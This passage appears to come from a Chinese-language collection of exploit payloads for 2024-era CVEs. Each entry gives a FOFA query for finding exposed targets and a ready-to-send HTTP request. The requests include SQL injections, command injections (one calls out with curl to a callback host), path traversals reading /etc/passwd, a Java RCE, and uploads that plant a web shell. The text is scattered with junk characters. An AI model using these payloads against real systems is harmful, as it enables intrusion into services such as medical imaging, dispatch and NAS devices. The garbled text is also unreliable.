2 |* t1 O2 w$ d# w& Y6 s5 rGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.14 l# ?/ F% a9 O
Host: x.x.x.x' Y' `* b+ Q: |1 f) f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% t& j) r! P9 j- w$ \) vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ b1 ^( e- S" E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& W8 N! K, t* p% xAccept-Encoding: gzip, deflate, br( c( w# z; f& [. Y j
Connection: close
3 O" b1 r2 R; r8 @% m7 LCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
' X; V, j1 i2 i J- m5 Q! eUpgrade-Insecure-Requests: 1
6 j2 q9 `' q2 h; ^. W; q9 E/ e- Z( g7 U- o' q: L! V
( N: E. [; X' b; Q0 k: L, t
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
9 m) O8 \8 y0 T* T! ~/ b9 [CVE-2024-2566( j$ ?% ~# f, l# y, j, `5 I
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
' F" W. t0 X+ T- KGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
8 ]9 Y* I/ O1 {3 Z" eHost: x.x.x.x
0 p1 K' p5 G' X5 `/ j5 I) IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. i$ Q6 j! u+ P( U/ f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. m& r9 c8 {( O0 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 ~3 l& i W' ]! K- C1 `1 y
Accept-Encoding: gzip, deflate, br
2 S- v6 W& ]/ g4 x5 l0 cConnection: close5 ^6 j, d* E% f0 I* O
Cookie: authcode=h8g9
% N' ^$ y$ ^" W" v2 F$ ~* AUpgrade-Insecure-Requests: 1
. \8 ]+ _. x2 O0 e* R6 ~* F& {
. s1 N+ z# {$ t- w. r, Y. W7 v( f9 W7 ?
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
$ F6 f% U+ Y7 vFOFA:body="指挥调度管理平台"
, X: d9 }: W) y3 U5 cPOST /app/ext/ajax_users.php HTTP/1.1
( f0 S7 d! a! S5 i+ X& _6 v! kHost: your-ip+ y; E; s6 k' P3 ]; A
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info0 r' h0 z3 D* K7 z
Content-Type: application/x-www-form-urlencoded% Z0 k4 V/ p: n2 D9 I0 a& G: K" K+ y
' p" L8 D; m0 s
1 P$ U% \: a( q" rdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -3 E6 h, R+ X$ [3 T% V) a
" L+ `- W6 K, W
/ e5 T0 l- n0 j' x" y. s0 }
142. CMSV6车辆监控平台系统中存在弱密码
) u8 J/ T3 \4 G: c+ E0 n) ~5 |CVE-2024-29666
+ B- U- J. `3 WFOFA:body="/808gps/"
' s- T. i- |# X1 madmin/admin
8 s+ k+ a( P5 j! X8 P2 \1 k' y143. Netis WF2780 v2.1.40144 远程命令执行
/ V: M# [8 R l1 F5 h0 [2 \" H( ?CVE-2024-25850% K6 i/ I, P! O1 ]# v$ c
FOFA:title='AP setup' && header='netis'
8 ^& S3 q# l8 }; U& gPAYLOAD% t: A* a- x6 x! J4 ]! f
9 g4 U: Q0 @% t
144. D-Link nas_sharing.cgi 命令注入$ P- M" q. P( v9 x) S
FOFA:app="D_Link-DNS-ShareCenter"( `& q$ r4 T+ |, t. x! w
system参数用于传要执行的命令- @1 T1 |/ Z j/ P" V
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
1 ` O* i% }9 l- ~/ ~" @2 A3 F5 gHost: x.x.x.x
1 D* N. c( L8 f- r1 g4 ?User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
( m4 R- m/ e; z0 t) y/ i" k% `Connection: close1 J% _4 ]4 A G/ Q, p: Z; l, Q
Accept: */*" R/ k, a9 U" r/ O3 a$ J3 w
Accept-Language: en4 M; Q& ~# [3 J( H1 Y$ d- a
Accept-Encoding: gzip
I3 C( x: t8 I) k
( }- F% a/ p% P5 \! H
$ G; K" @2 c/ ~( T$ L145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# G" |2 g/ \) ?6 F
CVE-2024-3400
9 z! T) H, K& f7 kFOFA:icon_hash="-631559155"$ f' j7 z" V, k* X
GET /global-protect/login.esp HTTP/1.1. j( L G) }- x2 n
Host: 192.168.30.112:1005
4 R- ?/ m; i. \! G( ?( L2 ? aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84) x$ m0 A. ]% Y
Connection: close
[2 H: ~- N& RCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
: ^/ t+ I- A1 v& u5 y" P zAccept-Encoding: gzip
$ s- M0 w0 V0 s% o8 r+ C% U; P3 h8 v7 N l9 U# r: W1 N
9 j+ h9 s) F8 @5 `/ P146. MajorDoMo thumb.php 未授权远程代码执行
7 J/ |% B6 k- v; C4 j, ^# b+ pCNVD-2024-02175
8 v0 H9 k, i$ M, o- pFOFA:app="MajordomoSL"; B2 D' R. H8 y/ N
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
1 d2 O% h! N5 W4 I$ T5 s+ |Host: x.x.x.x. g: _8 B+ W+ `4 {+ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.840 g* w; E# x! j r3 Y
Accept-Charset: utf-8
* X, r. `2 h; E$ n' KAccept-Encoding: gzip, deflate0 r X% H+ c7 i! F7 j6 j
Connection: close
9 S5 U" q# A1 E: E/ p( i- l% ^8 G3 z/ C! I# _, X
4 S6 K, R5 {) a) i% N( d0 u+ K147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
6 B" W3 P3 x K# [% bCVE-2024-32399
# n6 v3 e8 r; jFOFA:body="RaidenMAILD"& w4 j+ ^- l0 k+ C
GET /webeditor/../../../windows/win.ini HTTP/1.1) v' d. }, W- v2 M- \
Host: 127.0.0.1:81* H6 I5 a r! F/ E6 v
Cache-Control: max-age=0' F" f" j; g% R6 ?( r4 ^. ~
Connection: close
9 x! Q) l9 M, h5 X
5 l7 X: N; D6 y1 `) Z9 q9 B
- [( U; M9 f$ N0 D* }9 _: U$ t6 q0 D148. CrushFTP 认证绕过模板注入- {: F+ v# K# Y+ p1 y2 A9 a
CVE-2024-4040; K: W9 f0 D, [; ^# x: F1 s* I
FOFA:body="CrushFTP"6 w1 k% h' k+ K& z9 l( H7 E
PAYLOAD; `& w8 L7 u0 R! Q# x
. o; V$ M4 N+ H3 C; J+ a7 s" z149. AJ-Report开源数据大屏存在远程命令执行
1 G, \( }: E" N9 x8 JFOFA:title="AJ-Report"$ S2 |' K1 F0 y6 j
9 }% T! P1 o4 i) N8 s2 [POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Y9 h/ z7 N* J1 v4 N8 I+ Y' vHost: x.x.x.x1 F$ i* y- b' y Q; S+ C' `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( X9 M% o) ?9 s3 d; V8 q' sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ ?( D/ r' x9 v8 @3 _Accept-Encoding: gzip, deflate, br+ D3 S2 P" Z+ D% a8 b
Accept-Language: zh-CN,zh;q=0.9
! O( m+ A" X& f V" V; Y1 x* @Content-Type: application/json;charset=UTF-8( Z( H& p& Z. ~
Connection: close
7 A- l/ q/ L: @7 g+ E" H8 [" L! e6 f8 D" l ^
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}. k* [2 f$ S) t1 W7 k) \
6 p$ V% u- `& G/ ?* U' V150. AJ-Report 1.4.0 认证绕过与远程代码执行7 I: z& h' N6 @% A$ v, P/ B
FOFA:title="AJ-Report"
/ p! D8 m. n! r% @, R: bPOST /dataSetParam/verification;swagger-ui/ HTTP/1.15 z+ h. z6 B" E
Host: x.x.x.x
% H4 Q' a* `9 p- J+ d0 f9 A. iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; n# h( K0 P0 R6 T4 o1 T$ z3 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 C& q6 d8 r$ z6 Y" J% @
Accept-Encoding: gzip, deflate, br* |7 A; q. Z7 ?* C+ e8 S- `$ C
Accept-Language: zh-CN,zh;q=0.9* l( {1 g! y# B
Content-Type: application/json;charset=UTF-8
0 b8 w# h! J: Y- D* c9 iConnection: close2 Q9 o8 o e; {7 r$ b$ a- X+ z
Content-Length: 339
3 g1 r$ I* l) e0 J0 h3 n; ]' I2 l# Q2 I5 x% V$ [6 K3 v8 b
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
; c' U& F% t6 V4 ?* ~5 T, k# y6 {9 d- R2 t" d o" u4 N/ m: @
" b: p" f: {* w5 l5 u6 v, X }1 D151. AJ-Report 1.4.1 pageList sql注入) v/ T6 R8 Q5 F; N2 Q( H: H; r
FOFA:title="AJ-Report"
/ ^9 n+ w9 x2 T7 TGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
3 C; ?( y9 X5 g8 m: F8 ]Host: x.x.x.x W6 y S0 o$ P7 [9 A! o8 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# h# V4 Y$ h; ?7 L/ {8 PConnection: close
! O6 N! e+ c& p) c- H$ c' C8 h4 EAccept-Encoding: gzip" Y9 y. P' {5 _" j; p
: }& A$ H; G: `/ h: G8 T6 }1 \
152. Progress Kemp LoadMaster 远程命令执行
; C. M7 W* q7 F2 ~$ a6 tCVE-2024-1212
& p" w- r( J- J* g! u* Y) uLoadMaster <= 7.2.59.2 (GA)9 e2 N' n/ ~. @3 W, z
LoadMaster<=7.2.54.8 (LTSF)
$ x& o+ v2 x+ [) M" r' \' VLoadMaster <= 7.2.48.10 (LTS)
4 k6 X2 D! I5 Z1 N( cFOFA:body="LoadMaster"# S7 }# C; g! @% N( S1 g2 ]
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
! v3 h, }% d# ^1 x# `4 }4 eGET /access/set?param=enableapi&value=1 HTTP/1.1& s1 K" R* p" ?/ T" w. n
Host: x.x.x.x7 c# P5 V$ p( a) ~* C/ c5 l% v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1, N: ?) F h* b% I
Connection: close4 `- [. s* @5 v2 [/ _' |" c; ?" i$ V
Accept: */*% w3 o3 m5 |! M( ]8 z. @- c
Accept-Language: en' G% D4 Q9 `6 r) O: G: H$ ~
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=! i6 N& F0 R8 F5 F: w( Z
Accept-Encoding: gzip5 \) j( r/ x6 E0 i* @9 R4 K! O
9 N4 n$ A$ Y- S% T; A9 W) j! T$ [9 H# M
, }6 i# I( }8 R" O: @1 }$ h153. gradio任意文件读取
$ G7 ^& S/ \& A4 K+ h! {CVE-2024-1561FOFA:body="__gradio_mode__"
% w( ^. b3 y! N x( w2 B第一步,请求/config文件获取componets的id
6 n* ^1 J" j. ?9 f' H/ J3 Hhttp://x.x.x.x/config
7 c z8 y3 i( N* a/ p- S+ _6 k
1 q& U, j$ f0 f+ e6 O' l
第二步,将/etc/passwd的内容写入到一个临时文件
9 c6 z: W6 G$ Y) ?# I L2 t0 `POST /component_server HTTP/1.1
3 n9 b4 N# D3 M4 p tHost: x.x.x.x; E, h% ^7 @0 C4 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
2 O4 N# T( k: E2 @Connection: close, X0 l# a- H4 N& I7 N4 b+ A
Content-Length: 115
, W+ ^2 m% _3 IContent-Type: application/json" ^" y! v0 b) c& G, D
Accept-Encoding: gzip) d+ k* T' H" s
9 d; \: E0 y( s8 L( }. `{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
, c% c" E! [$ N+ y# l4 h
: E3 W; o# E' x: M P! {5 P6 w* W/ h! c! n5 k# }( @' }" n
第三步访问
/ p# S* X- X4 A0 J# m/ j+ [7 A% ohttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
$ r5 @" H+ i; i. Q. k' B/ S6 l' P3 Y @ @
+ r' Y* B, v* ^+ U9 ^7 P
154. 天维尔消防救援作战调度平台 SQL注入
7 G" z+ |$ J" OCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
- i* y) ]; l, o+ i4 r2 A2 JPOST /twms-service-mfs/mfsNotice/page HTTP/1.1" l) v' b" ?6 q. P
Host: x.x.x.x
3 b4 m0 j& @9 J' t& u% cContent-Length: 106
$ L; ^" a8 m$ W B) QCache-Control: max-age=0
# b& z8 j- n+ i0 d/ x+ OUpgrade-Insecure-Requests: 1
/ i) V0 W d( x5 ~Origin: http://x.x.x.x
, W2 X6 E) w* R9 [ {& LContent-Type: application/json
; g' U- I# b' X2 ^8 I$ F: bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.361 Q: G) M) C( @4 Y ]$ S& g: X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 s ?7 M# B; S% S; s# j
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page; {- b' S- s1 j9 T1 k, N7 i
Accept-Encoding: gzip, deflate& g _5 H; w, Q# H: p% V3 X
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
0 ~! Z/ D& {. I( a% _' zConnection: close
$ Q3 o- S, w' _! Z) R3 D5 I( J$ N; J) k
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}7 A6 z9 i4 r: r7 `& Z# J! H
3 a! s' X. f+ k4 T) ^7 C
; D; W/ X% K! K% M; D% W155. 六零导航页 file.php 任意文件上传# J# z2 x- K* v( H+ ^
CVE-2024-34982
8 } i+ L. ?7 I+ n/ @1 p; T" p) }' CFOFA:title=="上网导航 - LyLme Spage"
) j4 v5 z7 W& C. \1 yPOST /include/file.php HTTP/1.1# ^( ]: `6 E& O" U+ A% P- w1 ?
Host: x.x.x.x s- ~# ^- C! w7 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0# j$ ^1 h7 W6 {4 l: J, A& [
Connection: close6 p$ }$ z O7 g# r" M; u' b
Content-Length: 232! c' R+ P) ]9 A7 |1 z* T* }
Accept: application/json, text/javascript, */*; q=0.01
& u4 u+ w5 B5 M/ V0 `Accept-Encoding: gzip, deflate, br. i t: b8 z7 q0 q7 K+ }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( B5 K7 n: h3 u. bContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
$ ^. e: @% E- d7 t5 c! r8 l$ kX-Requested-With: XMLHttpRequest' `6 H3 U) A/ C6 _& Q4 C
- \, k5 r& m' h+ a; N) L: G) R8 n9 m-----------------------------qttl7vemrsold314zg0f' b/ ^6 o1 v9 P) ?! O1 @* U
Content-Disposition: form-data; name="file"; filename="test.php"2 n% C1 b7 Z( g, b4 ?& n, ~- A
Content-Type: image/png
- ]) n* o5 }9 s9 |% s) ?5 g" m0 `' p9 ]$ i5 _3 X& s" D0 u
<?php phpinfo();unlink(__FILE__);?>
1 L/ P5 T5 y& j7 d1 i( Q7 L7 Y1 l/ L-----------------------------qttl7vemrsold314zg0f--! E& k' W& D% F; B
* Z8 G5 \$ m3 j2 U7 n) E
" [7 v- @2 h, P. E1 D. _5 v7 s, Z' y访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php8 R4 [' q5 U! K S# P
9 T: y$ }1 I, |# g6 D2 P& Q156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ R2 n" E# v& h% i6 p/ T& MCVE-2024-3721
e8 P+ t2 g: ]4 I/ `) [FOFA:"Location: /login.rsp"! C. h8 \! i: [
·TBK DVR-4104& D, z+ _, @) N) o: n
·TBK DVR-42160 e+ g: w' X( _ q
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
Q9 W& S1 ]: e5 D, e( Y. }! [2 [5 ^
& s7 j* T, X3 K7 R2 F! XPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
" b9 e+ f: O7 ^Host: x.x.x.x
$ t0 U* ?0 h. {8 G2 [User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) Z% N4 f( H5 ^4 {8 p1 WConnection: close- F9 C$ [' [ |9 E
Content-Length: 0
; v. y/ E. ?. s3 v# wCookie: uid=1
' a, K8 e* [+ O9 ?$ R- Z# C5 f6 bAccept-Encoding: gzip
1 n% X. U: G( m3 r4 P, v
" B \" H. E" \, g8 S* C
- U& E; E8 o' z( b9 F157. 美特CRM upload.jsp 任意文件上传8 a4 J/ w9 e* E/ U3 F9 p
CNVD-2023-06971( Q) f! L1 K) N/ |* o
FOFA:body="/common/scripts/basic.js"8 u) J; E4 b( d& d
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.19 r+ \$ @: h' @9 Q
Host: x.x.x.x/ p1 e, i. \: O; D, G5 ^/ @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
2 c' p: u6 T- R. X" x! CContent-Length: 709% p4 c2 W( Z0 n3 D0 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 m% k g9 s5 w
Accept-Encoding: gzip, deflate5 c; Q: }2 R! [9 p! n
Accept-Language: zh-CN,zh;q=0.9; o. C, ]0 V0 n- |2 V
Cache-Control: max-age=0' W0 x0 S W/ I8 _
Connection: close# D; X& y" J# D$ V' ~: t3 n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
4 t* `* I" O0 y& A2 }Upgrade-Insecure-Requests: 1
. g x0 o* e8 S; a0 @- D
$ S3 ~% R/ g+ o* O$ l------WebKitFormBoundary1imovELzPsfzp5dN- E. {3 e' o, Q/ i$ e+ J+ c
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp": t3 c$ H- M$ V4 G7 q4 k
Content-Type: application/octet-stream9 x$ I1 P1 \8 D. X
/ y" e' @; u$ [/ Bnyhelxrutzwhrsvsrafb
6 N5 j0 s- [' V4 A( [" \# }. |------WebKitFormBoundary1imovELzPsfzp5dN
+ m6 p$ `$ R2 w$ \Content-Disposition: form-data; name="key"
' r! F1 v% V( x8 y, \! j1 ]3 y, f! W+ }8 Z, h5 B+ z- _8 K ~
null4 C* V' k+ i5 a4 F/ u
------WebKitFormBoundary1imovELzPsfzp5dN5 r8 J: M3 ^1 U& u6 U1 `) w
Content-Disposition: form-data; name="form"
1 F7 z* b+ n! {* b) e0 g J# X' K; S) H. o4 ?) r
null: G$ |+ @! `; S+ D, x- k# {8 W% \, e
------WebKitFormBoundary1imovELzPsfzp5dN
2 F) y& N# f& ~3 T5 jContent-Disposition: form-data; name="field"4 a" Q0 t" y4 }, j0 n7 e; s3 ^
# t- b) f! X: |* v
null
; t2 U7 J" D Q; |8 v/ r0 M------WebKitFormBoundary1imovELzPsfzp5dN! _' S2 L% \( ^: b7 E0 c \
Content-Disposition: form-data; name="filetitile"
$ O! Z e8 @+ \2 ^0 M. _
$ {8 V& m. B |/ ?$ Dnull
' X- F& B- R& J------WebKitFormBoundary1imovELzPsfzp5dN2 h( Q; q7 {6 d5 u8 o1 P9 F/ N
Content-Disposition: form-data; name="filefolder"" ]+ v: |' b' s- A# x
5 I6 J8 t3 [" V& Anull2 r6 c z. a4 }3 q
------WebKitFormBoundary1imovELzPsfzp5dN--
' X# H4 {/ w+ X: z- Q" @# A" X
" C5 m' P+ x' I* B! ]( U
! B! F+ p% T1 U, O( ahttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp2 X( X* J0 u K9 v# s1 a
& F |9 I! T# E0 I: u1 O& @0 l158. Mura-CMS-processAsyncObject存在SQL注入
5 M/ D) o9 r9 ~' zCVE-2024-326405 l: z# l" C- Z8 p. z
FOFA:"Generator: Masa CMS"
- U( ^3 C( G# h9 p0 e# T5 TPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
+ B7 X& d$ S" e* }% h4 fHost: {{Hostname}}
) X7 Z3 {$ R5 p, Z5 eContent-Type: application/x-www-form-urlencoded/ K9 L9 N4 }/ X/ p: S2 T
8 X4 t& @5 }5 B
object=displayregion&contenthistid=x\'&previewid=1
3 C, p& c# I1 G3 L
/ l' M7 S! K7 H/ [$ h% D O5 ?* S2 s( B6 Y
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传- e! [4 [8 y# S1 V) x
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
6 M+ y L) V5 G; u3 r$ i- DPOST /webservices/WebJobUpload.asmx HTTP/1.10 E0 d7 k! F: u7 M/ \! s: A) J
Host: x.x.x.x& D- H, z4 t P$ z3 @/ ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.361 G/ o7 b0 P1 z1 n& W0 T
Content-Length: 1080
0 |1 Z* ^3 {, a' g2 QAccept-Encoding: gzip, deflate8 _# E7 Y. r2 _; c1 q# n, p" V) A
Connection: close
; S9 ~* D4 d b4 d& ?% hContent-Type: text/xml; charset=utf-80 Q0 D2 b; P$ L" [, M2 c
Soapaction: "http://rainier/jobUpload"
8 T! [5 k, A! K1 [9 L3 z, r O6 B4 _
4 |6 J7 }( V, t: C' I5 M<?xml version="1.0" encoding="utf-8"?>
( ^. J9 p# N8 l% K+ b<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
7 t- Q6 y7 y7 S) X<soap:Body>
6 a- P7 h5 |2 l' T8 A9 c<jobUpload xmlns="http://rainier">' z% Y8 I3 k+ s3 n/ W- U2 p. S0 y
<vcode>1</vcode>" e3 h# T* C/ X
<subFolder></subFolder>
6 B. D0 n3 Q3 g" m$ D8 Y<fileName>abcrce.asmx</fileName>- c8 \1 H2 f/ Z% n7 v
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue> w( ~$ p+ q3 I" J) J# A
</jobUpload>: ~$ ~8 ~& `: A6 w5 l" `0 C$ D
</soap:Body>
4 r/ j) s, b; j6 _6 }9 ]0 E, G</soap:Envelope>7 J# m @; x0 f, ` u8 @2 f* s
# w. ]5 A* S3 N; v- z6 R0 j4 v, z6 {* ~" o2 a7 i+ e, {
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")1 _% D+ H7 u5 y- \" a- O/ ~* E% M4 B
1 B- U( x% W# V7 w( H
3 g; o* U/ V4 b! q9 D; R8 G, Y8 C# d160. Sonatype Nexus Repository 3目录遍历与文件读取
" L$ [2 z9 \4 {CVE-2024-4956
6 I1 M; u9 @: C6 H, QFOFA:title="Nexus Repository Manager"# S9 a, L# o$ [+ r3 {
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
2 l1 u9 \- L; n4 _5 ?1 P, w1 i; hHost: x.x.x.x
( Z4 e2 M* b2 j5 l/ tUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0! L! o# t1 U6 |5 A5 d/ k
Connection: close
5 Q$ F C3 c8 q6 ~2 |" ^Accept: */*
* [1 Z h8 B1 T/ xAccept-Language: en
5 B: h/ _' P. D5 f9 g/ v- S5 rAccept-Encoding: gzip
! J" s- p) E/ z0 ]2 I' i% `* D* Q" x, p# ? V4 H. k
I. o, W, m; ]! V( C161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传4 A3 \* L* S. c3 ?. G4 T7 y) N
FOFA:body="/KT_Css/qd_defaul.css"7 x$ Q( R+ O. ~% M8 l
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密* b! M! c5 }! q3 u% ]. E
POST /Webservice.asmx HTTP/1.1& ~" g! p: v1 p
Host: x.x.x.x
) n+ [) P2 J) Q- nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36- N- A; i) n' @8 O" P
Connection: close
2 V9 r9 Q3 C7 {; vContent-Length: 445
, u5 ?4 h9 Q% I6 W0 @( ] Q( ?( [Content-Type: text/xml
8 Q! d: z# e$ bAccept-Encoding: gzip( M* z6 d0 A$ s/ o% s
& D3 z- a' ]2 ?' X
<?xml version="1.0" encoding="utf-8"?>
5 H! c) x2 D4 c1 Z5 P4 i<soap:Envelope xmlns:xsi="
, W- ?- g* w, f/ }2 Ahttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
* D; u- N4 O1 Pxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">8 A& l. e4 t! B" z
<soap:Body>
